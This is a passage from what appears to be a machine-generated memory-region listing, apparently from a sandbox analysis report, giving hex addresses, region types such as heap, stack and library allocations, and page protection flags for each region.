trusted library allocation
page read and write
F86F000
heap
page read and write
7F84000
unkown
page read and write
23A82C95000
heap
page read and write
5367000
unkown
page read and write
7B16000
heap
page read and write
6B5E000
heap
page read and write
16ABD18C000
trusted library allocation
page read and write
EB24000
unkown
page read and write
3EE3000
unkown
page read and write
223E7BEC000
heap
page read and write
10B91000
heap
page read and write
CA3000
heap
page read and write
F2FF000
unkown
page read and write
7C98000
heap
page read and write
7FF5144DC000
unkown
page readonly
4912000
heap
page read and write
107DB000
heap
page read and write
4850000
heap
page read and write
1D785689000
heap
page read and write
2B20000
unkown
page read and write
F905000
heap
page read and write
7BE0000
heap
page read and write
8269000
unkown
page read and write
F37E000
unkown
page read and write
B3F0000
unkown
page read and write
449C000
stack
page read and write
CDDE000
unkown
page readonly
6CA0000
trusted library allocation
page read and write
7E22000
heap
page read and write
2760000
unkown
page read and write
7C27000
heap
page read and write
F62B000
heap
page read and write
68B7A3E000
stack
page read and write
7FF51466E000
unkown
page readonly
7C13000
heap
page read and write
F8EF000
heap
page read and write
5318000
unkown
page read and write
775000
heap
page read and write
1C80DDA9000
heap
page read and write
7FFEBFD10000
trusted library allocation
page read and write
41A1000
heap
page read and write
16AB9B30000
unkown
page read and write
7FF514713000
unkown
page readonly
4000000
unkown
page read and write
6AC5000
heap
page read and write
27F2000
heap
page read and write
88AB57C000
stack
page read and write
156BEBCB000
heap
page read and write
6AF5000
heap
page read and write
1E9DCE4C000
heap
page read and write
4420000
trusted library allocation
page read and write
7FF514701000
unkown
page readonly
57B0000
unkown
page readonly
8780000
stack
page readonly
F5BA000
heap
page read and write
73FA000
unkown
page readonly
E7F4000
unkown
page read and write
6E22000
unkown
page readonly
DAF000
heap
page read and write
846C000
stack
page read and write
7FFEBFD17000
trusted library allocation
page read and write
1E9DD7A9000
heap
page read and write
23A9CC19000
heap
page read and write
1F9E000
stack
page read and write
7B6A000
heap
page read and write
181B2CE0000
heap
page read and write
CA0000
heap
page read and write
7B43000
heap
page read and write
B70000
heap
page read and write
181CCFC1000
trusted library allocation
page read and write
7B81000
heap
page read and write
7DE9000
stack
page read and write
29CF000
stack
page read and write
FAF1000
heap
page read and write
20A3F920000
heap
page read and write
1DF7AE30000
trusted library allocation
page read and write
E7EA000
unkown
page read and write
7C13000
heap
page read and write
7FFEBFA93000
trusted library allocation
page execute and read and write
7FFF2E211000
unkown
page execute read
7FFEBFD30000
trusted library allocation
page read and write
7FF5146AC000
unkown
page readonly
1DF78F40000
heap
page read and write
951667F000
stack
page read and write
181CCBAD000
heap
page read and write
1FD1AF50000
trusted library allocation
page read and write
7708000
stack
page read and write
3304000
heap
page read and write
23A9CEF0000
trusted library allocation
page read and write
7FFEBFD70000
trusted library allocation
page read and write
218C8300000
heap
page read and write
7FF514B35000
unkown
page readonly
B74000
heap
page read and write
7FFEBFB30000
trusted library allocation
page read and write
156BEBD2000
heap
page read and write
F7CC000
heap
page read and write
488F000
heap
page read and write
24204D00000
heap
page read and write
7C2A000
heap
page read and write
1FD19514000
heap
page read and write
1D785633000
heap
page read and write
7785000
stack
page read and write
A53B000
stack
page read and write
7FFF2960A000
unkown
page readonly
7FF514865000
unkown
page readonly
520000
heap
page read and write
8246000
unkown
page read and write
6E87000
stack
page read and write
770000
heap
page read and write
181CCC90000
heap
page execute and read and write
4EEB000
stack
page read and write
1E9DD787000
heap
page read and write
68B77FD000
stack
page read and write
7590000
trusted library allocation
page read and write
27ED000
unkown
page read and write
EAE2000
unkown
page read and write
1FD1B560000
heap
page execute and read and write
844350B000
stack
page read and write
F5EF000
heap
page read and write
985C000
unkown
page read and write
D20F000
stack
page read and write
F8D5000
heap
page read and write
7B1B000
heap
page read and write
7B63000
heap
page read and write
7FFEBFA84000
trusted library allocation
page read and write
1094B000
heap
page read and write
7A91000
heap
page read and write
DB5000
heap
page read and write
27D2000
unkown
page read and write
41C1000
heap
page read and write
181CD4E0000
trusted library allocation
page read and write
76A7000
unkown
page read and write
1F1A07B0000
trusted library allocation
page read and write
7C34000
heap
page read and write
181B2AB0000
remote allocation
page read and write
1C80DAC0000
heap
page read and write
4D89000
stack
page read and write
7BD3000
heap
page read and write
7FFEBFAA0000
trusted library allocation
page read and write
441C000
stack
page read and write
C75B000
unkown
page read and write
7A5B000
heap
page read and write
1D785712000
trusted library allocation
page read and write
181CD440000
trusted library allocation
page read and write
EBF53FF000
stack
page read and write
20A4179F000
heap
page read and write
7FF514B33000
unkown
page readonly
7B1B000
heap
page read and write
FA68000
heap
page read and write
7B43000
heap
page read and write
1FD1C0C4000
trusted library allocation
page read and write
D2BA000
heap
page read and write
FA73000
heap
page read and write
7E65000
heap
page read and write
7FFF295EC000
unkown
page read and write
A1AE000
unkown
page readonly
223E7C21000
heap
page read and write
6C90000
heap
page readonly
3E0000
heap
page read and write
7FFF295EA000
unkown
page read and write
760D000
stack
page read and write
7FFF2E2BA000
unkown
page read and write
7DE8000
heap
page read and write
F7FA000
heap
page read and write
16ACBCA3000
trusted library allocation
page read and write
7B1B000
heap
page read and write
6720000
trusted library allocation
page read and write
7FF514806000
unkown
page readonly
7D5A000
heap
page read and write
6AA8000
heap
page read and write
4140000
heap
page read and write
201D000
stack
page read and write
CDFF000
unkown
page read and write
E744000
unkown
page read and write
7CA3000
heap
page read and write
7D30000
heap
page read and write
856000
heap
page read and write
7FF514509000
unkown
page readonly
7C6A000
heap
page read and write
9A0000
unkown
page readonly
7E2C000
heap
page read and write
1E9DD5A0000
trusted library allocation
page read and write
1FD1C1C0000
trusted library allocation
page read and write
181B4A7B000
trusted library allocation
page read and write
66A3000
trusted library allocation
page read and write
8417000
system
page read and write
7D17000
heap
page read and write
223E990E000
heap
page read and write
3304000
heap
page read and write
783E000
unkown
page read and write
EEE8000
stack
page read and write
7FF514BDF000
unkown
page readonly
7C19000
heap
page read and write
7FF5144B8000
unkown
page readonly
1D785620000
heap
page read and write
223E7C23000
heap
page read and write
7FF514713000
unkown
page readonly
6A96000
heap
page read and write
7E51000
heap
page read and write
7F7A000
unkown
page read and write
7FFEBFA93000
trusted library allocation
page read and write
1E9DD76D000
heap
page read and write
7F88000
stack
page read and write
7B81000
heap
page read and write
F677000
heap
page read and write
7FF5148F8000
unkown
page readonly
6B34000
heap
page read and write
796E000
stack
page read and write
7FF514727000
unkown
page readonly
F7EE000
heap
page read and write
2320000
unkown
page readonly
7FF514727000
unkown
page readonly
7B52000
heap
page read and write
1DF78F48000
heap
page read and write
700000
unkown
page read and write
6AE0000
heap
page read and write
1F19B113000
heap
page read and write
1FD1C2D8000
trusted library allocation
page read and write
181B2D10000
heap
page read and write
48F6000
heap
page read and write
4D0E000
stack
page read and write
558000
heap
page read and write
42A0000
unkown
page read and write
43D0000
trusted library allocation
page read and write
52F0000
unkown
page read and write
4B2B000
stack
page read and write
A53B000
stack
page read and write
7DFC000
heap
page read and write
6FD000
stack
page read and write
990000
unkown
page readonly
56B000
heap
page read and write
1D7857FA000
heap
page read and write
7C34000
heap
page read and write
6D00000
trusted library allocation
page read and write
5296000
stack
page read and write
A6EA000
stack
page read and write
16ABB5C0000
trusted library allocation
page read and write
7D64000
heap
page read and write
1E9DCE27000
heap
page read and write
2320000
unkown
page readonly
B50000
trusted library allocation
page execute and read and write
7FFF2E2B5000
unkown
page read and write
A15C000
unkown
page readonly
7694000
unkown
page read and write
4710000
unkown
page read and write
1FD1B3DB000
heap
page read and write
F8FD000
heap
page read and write
1FD1C4B5000
trusted library allocation
page read and write
8C0D000
unkown
page read and write
107D1000
heap
page read and write
3FF0000
unkown
page readonly
11A6D000
stack
page read and write
218C8228000
heap
page read and write
7E41000
heap
page read and write
7E0C000
heap
page read and write
7DC8000
heap
page read and write
F7BB000
heap
page read and write
6AE0000
heap
page read and write
4E0000
unkown
page read and write
1D785689000
heap
page read and write
7FF51466E000
unkown
page readonly
7FFF2E3B0000
unkown
page read and write
531E000
stack
page read and write
A66B000
stack
page read and write
7FF514A9D000
unkown
page readonly
9A5B000
unkown
page read and write
48A6000
heap
page read and write
7DD7000
heap
page read and write
A002000
unkown
page readonly
7FFEBFB36000
trusted library allocation
page read and write
2870000
heap
page read and write
7F7A000
unkown
page read and write
20A41A80000
heap
page read and write
8443FFF000
stack
page read and write
181CD420000
trusted library allocation
page read and write
E74F000
unkown
page read and write
441F000
heap
page read and write
690C000
stack
page read and write
D30C000
stack
page read and write
7DC6000
heap
page read and write
8233000
unkown
page read and write
7E62000
heap
page read and write
16ABB603000
heap
page read and write
5371000
unkown
page read and write
6B78000
heap
page read and write
7C17000
heap
page read and write
6ADF000
heap
page read and write
7AE7000
heap
page read and write
790A000
stack
page read and write
E092000
unkown
page read and write
8B89000
unkown
page read and write
7FF514500000
unkown
page readonly
EBF50FE000
stack
page read and write
7FFEBFC32000
trusted library allocation
page read and write
F7FA000
heap
page read and write
CA2000
heap
page read and write
56B000
heap
page read and write
52D000
heap
page read and write
820A000
unkown
page read and write
1FD19600000
trusted library allocation
page read and write
7FF514709000
unkown
page readonly
CE1C000
unkown
page readonly
CEA5000
unkown
page readonly
7200000
trusted library allocation
page read and write
FBD2000
heap
page read and write
F90D000
heap
page read and write
8443AFD000
stack
page read and write
193F2880000
heap
page read and write
7DEA000
heap
page read and write
F8F9000
heap
page read and write
7B91000
heap
page read and write
825000
heap
page read and write
20A41C82000
heap
page read and write
6AF5000
heap
page read and write
2B2B000
heap
page read and write
418F000
heap
page read and write
7DEE000
heap
page read and write
7B52000
heap
page read and write
71F0000
trusted library allocation
page read and write
F8F5000
heap
page read and write
7FF514413000
unkown
page readonly
763BAFE000
stack
page read and write
CD63000
unkown
page readonly
1D25C0E000
stack
page read and write
7D17000
heap
page read and write
2AB5000
stack
page read and write
5E90000
trusted library allocation
page read and write
D6A0000
unkown
page execute and read and write
7D69000
stack
page read and write
E74F000
unkown
page read and write
ACE9000
stack
page read and write
22FE000
stack
page read and write
2370000
heap
page read and write
7FF514BB9000
unkown
page readonly
181CCFC0000
trusted library allocation
page read and write
7A98000
heap
page read and write
7F74000
unkown
page read and write
A253000
unkown
page readonly
181B60C9000
trusted library allocation
page read and write
4130000
unkown
page read and write
1E9DD7A9000
heap
page read and write
7C21000
heap
page read and write
7E53000
heap
page read and write
527FF7000
stack
page read and write
181CCC96000
heap
page execute and read and write
8206000
unkown
page read and write
AD6A000
stack
page read and write
20A41D10000
heap
page read and write
7FFEBFC32000
trusted library allocation
page read and write
1E9DD794000
heap
page read and write
6ADF000
heap
page read and write
7FF514C35000
unkown
page readonly
7B91000
heap
page read and write
181B2B90000
heap
page read and write
D9EE000
stack
page read and write
7FFF2E209000
unkown
page readonly
7FF5149EF000
unkown
page readonly
223E7C15000
heap
page read and write
1C80DDE4000
heap
page read and write
41B6000
heap
page read and write
1E9DD7D7000
heap
page read and write
7FFF295F0000
unkown
page read and write
4000000
unkown
page read and write
7C34000
heap
page read and write
7FF514BCC000
unkown
page readonly
7FF514C01000
unkown
page readonly
6CF0000
trusted library allocation
page read and write
1C80DB2C000
heap
page read and write
951617E000
stack
page read and write
25DF000
stack
page read and write
7FFF2E120000
unkown
page readonly
7CD4000
heap
page read and write
9690000
unkown
page read and write
D34F77B000
stack
page read and write
7C9F000
heap
page read and write
7C2A000
heap
page read and write
10B9A000
heap
page read and write
825000
heap
page read and write
23A84E93000
trusted library allocation
page read and write
F8CE000
heap
page read and write
51B0000
unkown
page read and write
EEFA000
unkown
page read and write
76EE000
unkown
page read and write
7B16000
heap
page read and write
23A9CF10000
trusted library allocation
page read and write
181CD3E0000
trusted library allocation
page read and write
16ABD0FB000
trusted library allocation
page read and write
480C000
unkown
page read and write
1DF00212000
trusted library allocation
page read and write
7CC2000
heap
page read and write
27B7000
unkown
page read and write
D76B000
stack
page read and write
7FFF2E2BE000
unkown
page read and write
778000
heap
page read and write
97BE000
heap
page read and write
1F1A0A8A000
heap
page read and write
223E98A1000
heap
page read and write
F8E3000
heap
page read and write
6E1B000
unkown
page readonly
870000
unkown
page readonly
7FF514A3C000
unkown
page readonly
7B57000
heap
page read and write
7515000
unkown
page readonly
4280000
trusted library section
page read and write
7FFEBFDF0000
trusted library allocation
page read and write
4240000
heap
page read and write
B74000
heap
page read and write
4436000
heap
page read and write
CEAC000
unkown
page readonly
F07A000
unkown
page read and write
7D30000
heap
page read and write
7100000
trusted library allocation
page read and write
3458000
heap
page read and write
2C10000
heap
page read and write
29C0000
trusted library allocation
page read and write
41CC000
heap
page read and write
57C0000
trusted library allocation
page read and write
8269000
unkown
page read and write
41CC000
heap
page read and write
768C000
unkown
page read and write
7DCE000
heap
page read and write
7FFEBFD30000
trusted library allocation
page read and write
928E000
unkown
page read and write
7E2F000
heap
page read and write
1DF7AFA5000
heap
page read and write
16AD4020000
trusted library allocation
page read and write
E21D000
unkown
page read and write
7FF51481F000
unkown
page readonly
7B4F000
heap
page read and write
68B73E5000
stack
page read and write
223E991A000
heap
page read and write
6AC9000
heap
page read and write
796E000
stack
page read and write
1F19B078000
heap
page read and write
1F19BA15000
heap
page read and write
7C23000
heap
page read and write
441C000
stack
page read and write
609000
heap
page read and write
56B000
heap
page read and write
7FF514853000
unkown
page readonly
F90F000
heap
page read and write
7FF514AB1000
unkown
page readonly
F5EF000
heap
page read and write
1C80BD50000
heap
page read and write
7FF514B33000
unkown
page readonly
23A82C40000
heap
page read and write
23A9CF2C000
heap
page read and write
23A82BD0000
heap
page read and write
B0E000
stack
page read and write
69D0000
trusted library allocation
page read and write
5A6000
heap
page read and write
2778000
system
page execute and read and write
2778000
system
page execute and read and write
426F000
heap
page read and write
DF10000
heap
page read and write
4B2B000
stack
page read and write
7DF446130000
trusted library allocation
page readonly
6BD8000
heap
page read and write
3F00000
unkown
page write copy
1C80DCD0000
heap
page read and write
1DF7B360000
trusted library allocation
page read and write
223E98A8000
heap
page read and write
956B000
stack
page read and write
782F000
unkown
page read and write
1176B000
stack
page read and write
870000
unkown
page readonly
6AF2000
heap
page read and write
23A84A25000
trusted library allocation
page read and write
A66B000
stack
page read and write
83B1000
unkown
page read and write
1C80BDB5000
heap
page read and write
7F74000
unkown
page read and write
2360000
unkown
page read and write
B8E4FF8000
stack
page read and write
C80000
system
page execute and read and write
7CE000
heap
page read and write
181CD3F0000
trusted library allocation
page read and write
1D24AFD000
stack
page read and write
C06B000
stack
page read and write
5E6000
heap
page read and write
223E98F9000
heap
page read and write
6B5E000
heap
page read and write
10B15000
heap
page read and write
181CCBB2000
heap
page read and write
72F7000
unkown
page readonly
7FFEBFDC0000
trusted library allocation
page read and write
708D000
stack
page read and write
7FFF2E121000
unkown
page execute read
1DF79031000
heap
page read and write
455E000
stack
page read and write
4206000
heap
page read and write
7FF5144C7000
unkown
page readonly
863000
heap
page read and write
47BF000
heap
page read and write
BAEF000
stack
page read and write
800000
heap
page read and write
44C2000
heap
page read and write
7DF4670F0000
trusted library allocation
page execute and read and write
10B0F000
heap
page read and write
7DFC000
heap
page read and write
A06A000
unkown
page readonly
4140000
heap
page read and write
7089000
stack
page read and write
23A85009000
trusted library allocation
page read and write
22E1B425000
unkown
page read and write
7694000
unkown
page read and write
1FD19690000
trusted library allocation
page read and write
193F29E0000
trusted library allocation
page read and write
7DC8000
heap
page read and write
7FFEBFA80000
trusted library allocation
page read and write
FBB3000
heap
page read and write
16ABBBF7000
heap
page read and write
43E0000
heap
page read and write
ECFB000
unkown
page read and write
FAF5000
heap
page read and write
7FF5148AB000
unkown
page readonly
7A98000
heap
page read and write
B3F0000
unkown
page read and write
5FF000
heap
page read and write
7AD0000
heap
page read and write
DAF0000
unkown
page read and write
F876000
heap
page read and write
7F9D000
unkown
page read and write
7CFE000
heap
page read and write
FA4B000
heap
page read and write
F8E1000
heap
page read and write
181CCFA1000
trusted library allocation
page read and write
7DF446131000
trusted library allocation
page execute read
10AF8000
heap
page read and write
763CA0D000
stack
page read and write
7A91000
heap
page read and write
D34FA7E000
stack
page read and write
7C9D000
heap
page read and write
9F6F000
unkown
page readonly
7DA5000
heap
page read and write
23A82CC0000
heap
page read and write
7FFEBFC60000
trusted library allocation
page execute and read and write
8235000
unkown
page read and write
2320000
unkown
page readonly
1FD337B4000
heap
page read and write
7FBD000
unkown
page read and write
22E1B602000
heap
page read and write
7DE9000
stack
page read and write
2BB9000
stack
page read and write
7DDE000
heap
page read and write
F8E3000
heap
page read and write
6B79000
heap
page read and write
7B81000
heap
page read and write
71E0000
trusted library allocation
page read and write
23A84A21000
trusted library allocation
page read and write
7CFD000
heap
page read and write
7DF4159B1000
unkown
page execute read
7B1B000
heap
page read and write
7FFEBFA9C000
trusted library allocation
page read and write
7D99000
heap
page read and write
223E98A8000
heap
page read and write
2100000
heap
page read and write
7FF514B18000
unkown
page readonly
2B00000
unkown
page readonly
95166FC000
stack
page read and write
6CC0000
trusted library allocation
page read and write
7FF514A9B000
unkown
page readonly
7B52000
heap
page read and write
7D6A000
heap
page read and write
970000
unkown
page readonly
48A9000
heap
page read and write
8228000
unkown
page read and write
C690000
unkown
page readonly
1D785710000
trusted library allocation
page read and write
6CEB000
stack
page read and write
7D29000
heap
page read and write
BEEB000
stack
page read and write
7FF51471F000
unkown
page readonly
48C7000
system
page read and write
7FFEBFDA0000
trusted library allocation
page read and write
7FFEBFC30000
trusted library allocation
page read and write
6B34000
heap
page read and write
43C8000
stack
page read and write
6AA8000
heap
page read and write
7FF514710000
unkown
page readonly
836A000
stack
page read and write
76A3000
unkown
page read and write
291E000
stack
page read and write
24204D08000
heap
page read and write
F8E3000
heap
page read and write
7FF514C87000
unkown
page readonly
7DEA000
heap
page read and write
20A41D51000
heap
page read and write
46CA000
system
page read and write
2881000
unkown
page read and write
E9E4000
unkown
page read and write
4680000
unkown
page readonly
7D99000
heap
page read and write
22E1B515000
trusted library allocation
page read and write
753E000
unkown
page readonly
C11E000
unkown
page readonly
4450000
heap
page read and write
FBAB000
heap
page read and write
277D000
heap
page read and write
214A000
stack
page read and write
7B4F000
heap
page read and write
6EE3000
trusted library allocation
page read and write
7FF4F5B34000
unkown
page readonly
E0D5000
unkown
page read and write
23A9CB80000
trusted library allocation
page read and write
24204C3C000
heap
page read and write
7605000
unkown
page readonly
81C000
heap
page read and write
1F1A0B02000
heap
page read and write
20F8C213000
heap
page read and write
9876000
heap
page read and write
490E000
heap
page read and write
24CE000
stack
page read and write
4DD0000
unkown
page read and write
5282FE000
stack
page read and write
7D5F000
heap
page read and write
62AD000
unkown
page read and write
A260000
unkown
page readonly
C6BB000
unkown
page readonly
223E9960000
heap
page read and write
844417E000
stack
page read and write
6B02000
heap
page read and write
7FF514C35000
unkown
page readonly
2819000
unkown
page read and write
7FF514A57000
unkown
page readonly
1DF7AE50000
heap
page execute and read and write
6E22000
unkown
page readonly
293E000
stack
page read and write
7DD1000
heap
page read and write
7F89000
unkown
page read and write
156BEE00000
heap
page read and write
107B2000
heap
page read and write
293C000
stack
page read and write
23A94A10000
trusted library allocation
page read and write
EAAB000
unkown
page read and write
7B0E000
heap
page read and write
2B2F000
heap
page read and write
7D5F000
heap
page read and write
8F6D000
stack
page read and write
7CFB000
heap
page read and write
4130000
unkown
page read and write
7FFEBFCC0000
trusted library allocation
page read and write
AA6B000
stack
page read and write
16ABBB0A000
heap
page read and write
7FFEBFE10000
trusted library allocation
page read and write
71C0000
trusted library allocation
page read and write
4CAE000
stack
page read and write
8D0D000
unkown
page read and write
97C6000
heap
page read and write
6AE0000
heap
page read and write
10C39000
heap
page read and write
7B11000
heap
page read and write
73F3000
trusted library allocation
page read and write
740D000
stack
page read and write
F7EE000
heap
page read and write
7FF514A60000
unkown
page readonly
84443F9000
stack
page read and write
3FB6000
trusted library allocation
page read and write
1FD19610000
heap
page readonly
670000
unkown
page readonly
7FF5144E8000
unkown
page readonly
CC24000
unkown
page readonly
6A95000
heap
page read and write
16ABBBBF000
heap
page read and write
7FF514788000
unkown
page readonly
68B7C3E000
stack
page read and write
69C0000
trusted library allocation
page read and write
3304000
heap
page read and write
284E000
heap
page read and write
43E1000
heap
page read and write
F876000
heap
page read and write
298C000
stack
page read and write
DF12000
heap
page read and write
7DF446151000
trusted library allocation
page execute read
D5C000
stack
page read and write
F7B9000
heap
page read and write
75E3000
unkown
page readonly
53A9000
stack
page read and write
24204C29000
heap
page read and write
1E9DD784000
heap
page read and write
7DEE000
heap
page read and write
1E9DCEC2000
heap
page read and write
1F1A0B02000
heap
page read and write
7BD3000
heap
page read and write
EC7D000
unkown
page read and write
23A9CCF6000
heap
page read and write
7E51000
heap
page read and write
201E000
stack
page read and write
1FD1C1B7000
trusted library allocation
page read and write
7FF5144C9000
unkown
page readonly
2100000
heap
page read and write
7FF514B9F000
unkown
page readonly
A9EB000
stack
page read and write
1E9DD7C7000
heap
page read and write
7B91000
heap
page read and write
46B0000
unkown
page readonly
73D5000
trusted library allocation
page read and write
6AA8000
heap
page read and write
109E7000
heap
page read and write
48D6000
heap
page read and write
C6A0000
unkown
page readonly
7FFEBFB40000
trusted library allocation
page execute and read and write
FCAF000
heap
page read and write
5AD000
heap
page read and write
745C000
unkown
page readonly
7DF446111000
trusted library allocation
page execute read
80EE000
unkown
page read and write
3F50000
unkown
page read and write
5A6000
heap
page read and write
23A84E8C000
trusted library allocation
page read and write
B169000
stack
page read and write
1FD1AF50000
trusted library allocation
page read and write
CC24000
unkown
page readonly
7FF514A7F000
unkown
page readonly
7C15000
heap
page read and write
77A6000
unkown
page read and write
7FF514C87000
unkown
page readonly
7BE0000
heap
page read and write
16ABBBFC000
heap
page read and write
770000
heap
page read and write
5D9000
heap
page read and write
7B16000
heap
page read and write
2835000
heap
page read and write
44CE000
heap
page read and write
7DF415A90000
unkown
page readonly
223E98B4000
heap
page read and write
CB9F000
unkown
page readonly
43B0000
trusted library allocation
page read and write
7FF514BB4000
unkown
page readonly
223E9895000
heap
page read and write
23A8504C000
trusted library allocation
page read and write
520000
heap
page read and write
7CF7000
heap
page read and write
23A9CEF0000
trusted library allocation
page read and write
97B8000
heap
page read and write
181CCFB1000
trusted library allocation
page read and write
970000
heap
page read and write
748D000
stack
page read and write
64AD000
stack
page read and write
75FC000
unkown
page read and write
10969000
heap
page read and write
7E14000
heap
page read and write
D38C000
stack
page read and write
6F8C000
stack
page read and write
4194000
heap
page read and write
23A82CFC000
heap
page read and write
209E000
stack
page read and write
1DF00B92000
trusted library allocation
page read and write
763BEBE000
stack
page read and write
482E000
heap
page read and write
24205402000
trusted library allocation
page read and write
4393000
unkown
page read and write
7D62000
heap
page read and write
DB56000
unkown
page read and write
1F19B9E1000
trusted library allocation
page read and write
1FD1B000000
trusted library allocation
page read and write
7B0000
remote allocation
page read and write
7D30000
heap
page read and write
780000
stack
page readonly
1F19BB13000
heap
page read and write
97C2000
heap
page read and write
F903000
heap
page read and write
3F00000
unkown
page write copy
F8ED000
heap
page read and write
41FA000
stack
page read and write
7B0D000
heap
page read and write
710E000
stack
page read and write
97BC000
heap
page read and write
2A39000
stack
page read and write
6141000
unkown
page read and write
57E0000
unkown
page readonly
7FFEBFD17000
trusted library allocation
page read and write
62AD000
unkown
page read and write
8237000
unkown
page read and write
7CF1000
heap
page read and write
3CF7000
trusted library allocation
page read and write
2370000
heap
page read and write
7FF51483F000
unkown
page readonly
7AA4000
heap
page read and write
9308000
unkown
page read and write
20F8C250000
heap
page read and write
7CDA000
heap
page read and write
7FF514915000
unkown
page readonly
7B4F000
heap
page read and write
223E9980000
heap
page read and write
B8E4BFF000
stack
page read and write
1D785656000
heap
page read and write
1C80DDE4000
heap
page read and write
5F8000
heap
page read and write
7FF514913000
unkown
page readonly
1FD33618000
heap
page read and write
10B0F000
heap
page read and write
7FF5147E0000
unkown
page readonly
2BC0000
unkown
page readonly
223E98A1000
heap
page read and write
763B87E000
stack
page read and write
2754000
trusted library allocation
page read and write
2D5F000
stack
page read and write
E770000
unkown
page read and write
7FF514AC1000
unkown
page readonly
7400000
trusted library allocation
page read and write
1FD1C566000
trusted library allocation
page read and write
293C000
stack
page read and write
EDF7000
unkown
page read and write
F706000
heap
page read and write
7FF514BBF000
unkown
page readonly
C680000
unkown
page readonly
156BEBE7000
heap
page read and write
AB359BE000
stack
page read and write
7FFEBFA8D000
trusted library allocation
page execute and read and write
6AE0000
heap
page read and write
3ED3000
unkown
page read and write
7FF514742000
unkown
page readonly
6AF2000
heap
page read and write
968C000
unkown
page read and write
74C3000
unkown
page readonly
E74F000
unkown
page read and write
1E9DD7B0000
heap
page read and write
CEC2000
unkown
page readonly
EA63000
unkown
page read and write
7B43000
heap
page read and write
1DF79080000
heap
page read and write
7FF514B2B000
unkown
page readonly
5A6000
heap
page read and write
7FF514ADB000
unkown
page readonly
FEDD000
stack
page read and write
7FFEBFC22000
trusted library allocation
page read and write
4270000
trusted library section
page read and write
A76E000
stack
page read and write
181B4A00000
heap
page execute and read and write
7D72000
heap
page read and write
48F6000
heap
page read and write
7FFEBFD20000
trusted library allocation
page read and write
28BF000
stack
page read and write
F8D2000
heap
page read and write
2C5E000
stack
page read and write
62F4000
unkown
page read and write
1D24A75000
stack
page read and write
7B6A000
heap
page read and write
20F8C308000
heap
page read and write
6A33000
trusted library allocation
page read and write
7FFF2E3A5000
unkown
page read and write
7C58000
heap
page read and write
43B74FF000
stack
page read and write
EB24000
unkown
page read and write
46C0000
unkown
page read and write
7FFEBFC90000
trusted library allocation
page read and write
23A9CF2F000
heap
page read and write
28CC000
stack
page read and write
1DF10001000
trusted library allocation
page read and write
C9FD000
unkown
page readonly
7FF514AE2000
unkown
page readonly
7FF514AAE000
unkown
page readonly
7DEA000
heap
page read and write
530A000
unkown
page read and write
181CD4F0000
trusted library allocation
page read and write
7FFF2E120000
unkown
page readonly
9FF4000
unkown
page readonly
42DB000
trusted library allocation
page execute and read and write
2AB5000
stack
page read and write
1E9DD700000
heap
page read and write
5F3000
heap
page read and write
900D000
unkown
page read and write
7DE4000
heap
page read and write
181B2C84000
heap
page read and write
7B11000
heap
page read and write
7FFEBFD20000
trusted library allocation
page read and write
7C21000
heap
page read and write
2AF0000
unkown
page read and write
7FF514A13000
unkown
page readonly
1D7855F0000
trusted library allocation
page read and write
346C000
heap
page read and write
181CD460000
trusted library allocation
page read and write
FA63000
heap
page read and write
6E1E000
unkown
page readonly
193F3202000
trusted library allocation
page read and write
B8E4DF7000
stack
page read and write
822E000
unkown
page read and write
7D99000
heap
page read and write
181CD1B0000
heap
page read and write
AB1D4FB000
stack
page read and write
181CCC60000
trusted library allocation
page read and write
7FF514A3C000
unkown
page readonly
181CCDBC000
heap
page read and write
7B16000
heap
page read and write
23A849F0000
heap
page execute and read and write
7FF5146D0000
unkown
page readonly
753E000
unkown
page readonly
7FF514BB6000
unkown
page readonly
23A9CDC0000
trusted library allocation
page read and write
6EE5000
trusted library allocation
page read and write
558000
heap
page read and write
1C80DFE5000
heap
page read and write
B0EE000
stack
page read and write
772E000
unkown
page read and write
950A000
unkown
page read and write
181C4A20000
trusted library allocation
page read and write
D08B000
stack
page read and write
E278000
unkown
page read and write
7B4B000
heap
page read and write
CA0000
heap
page read and write
763B9FE000
stack
page read and write
1DF78F7A000
heap
page read and write
7FF5144D4000
unkown
page readonly
F7B3000
heap
page read and write
D9EA000
stack
page read and write
4DB0000
unkown
page read and write
71B0000
trusted library allocation
page read and write
730F000
unkown
page readonly
CF7C000
unkown
page read and write
24204C53000
heap
page read and write
96A4000
unkown
page read and write
97B8000
heap
page read and write
1DF78F88000
heap
page read and write
CEB9000
unkown
page readonly
1E9DCE4E000
heap
page read and write
181CCE4C000
heap
page read and write
88AB67B000
stack
page read and write
EAE2000
unkown
page read and write
7FF5146EB000
unkown
page readonly
7FF5144BA000
unkown
page readonly
7B1B000
heap
page read and write
1F19C080000
trusted library allocation
page read and write
4479000
heap
page read and write
7CC4000
heap
page read and write
7B5B000
heap
page read and write
7FF5144D2000
unkown
page readonly
1D7855D0000
trusted library allocation
page read and write
7FF5146F1000
unkown
page readonly
AA6000
heap
page read and write
1FD196F0000
heap
page read and write
1E9DCCA0000
heap
page read and write
7FFEBFAA3000
trusted library allocation
page execute and read and write
D2B8000
heap
page read and write
48A9000
heap
page read and write
7FF5148EB000
unkown
page readonly
2A5D000
stack
page read and write
7FFEBFCC0000
trusted library allocation
page read and write
181CD400000
trusted library allocation
page read and write
4816000
heap
page read and write
4A42000
system
page read and write
2870000
heap
page read and write
710E000
stack
page read and write
7FFF2E3A3000
unkown
page read and write
7BD3000
heap
page read and write
7B6A000
heap
page read and write
3EF0000
unkown
page read and write
7FF514A7F000
unkown
page readonly
1D7857F5000
heap
page read and write
42A0000
unkown
page read and write
7FFEBFDA0000
trusted library allocation
page read and write
6D00000
trusted library allocation
page read and write
1FD19544000
heap
page read and write
23A849D0000
heap
page read and write
6A10000
trusted library allocation
page read and write
193F2A4B000
heap
page read and write
2809000
unkown
page read and write
7FF514C0E000
unkown
page readonly
4D89000
stack
page read and write
FCE6000
heap
page read and write
223E98A5000
heap
page read and write
F47B000
unkown
page read and write
7CC4000
heap
page read and write
107FF000
heap
page read and write
1FD19498000
heap
page read and write
F901000
heap
page read and write
20A4196A000
heap
page read and write
6733000
trusted library allocation
page read and write
8277000
unkown
page read and write
16AB9F00000
heap
page read and write
2A58000
stack
page read and write
84441FE000
stack
page read and write
7B4B000
heap
page read and write
20A4189F000
heap
page read and write
277A000
unkown
page read and write
81C000
heap
page read and write
7D99000
heap
page read and write
7A91000
heap
page read and write
68B79FA000
stack
page read and write
8E0E000
unkown
page read and write
7D49000
heap
page read and write
97F9000
heap
page read and write
7FFF295E3000
unkown
page read and write
7CF4000
heap
page read and write
7FF514909000
unkown
page readonly
181CCFF0000
trusted library allocation
page read and write
7590000
unkown
page read and write
96C1000
unkown
page read and write
5A6000
heap
page read and write
70D0000
trusted library allocation
page read and write
7B16000
